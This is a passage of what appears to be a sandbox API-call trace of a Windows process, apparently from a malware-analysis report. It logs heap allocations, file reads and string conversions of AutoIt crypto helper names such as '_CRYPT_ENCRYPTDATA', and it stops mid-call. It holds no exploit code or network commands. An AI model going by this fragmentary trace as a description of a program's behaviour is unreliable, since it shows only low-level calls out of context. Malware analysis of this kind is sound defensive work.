(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0191.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0191.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0191.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0191.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0191.157] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0191.157] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0191.157] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0191.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0191.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0191.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0191.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0191.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0191.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0191.158] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0191.158] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0191.161] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x58e9, lpOverlapped=0x0) returned 1 [0191.162] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0191.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0191.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0191.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x158e9) returned 0xbea018 [0191.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0191.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0191.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0191.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0191.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0191.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x158e9) returned 0xa5f008 [0191.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0191.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.165] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0191.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0191.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x158e9) returned 0xbea018 [0191.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0191.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0191.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0191.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.166] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0191.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0191.166] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0191.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.166] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0191.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0191.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0191.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0191.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0191.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x158e9) returned 0xbea018 [0191.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2758 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0191.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0191.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x158e9) returned 0xa74900 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0191.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0191.168] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0191.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0191.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0191.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0191.169] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0191.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0191.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0191.169] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0191.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27c8 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0191.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a60 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0191.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0191.169] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0191.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0191.170] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0191.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0191.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0191.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0191.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0191.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0191.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0191.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0191.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0191.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.171] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0191.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0191.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0191.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0191.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0191.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0191.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0191.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0191.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0191.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0191.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0191.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0191.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0191.172] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0191.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0191.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0191.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0191.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0191.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.173] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 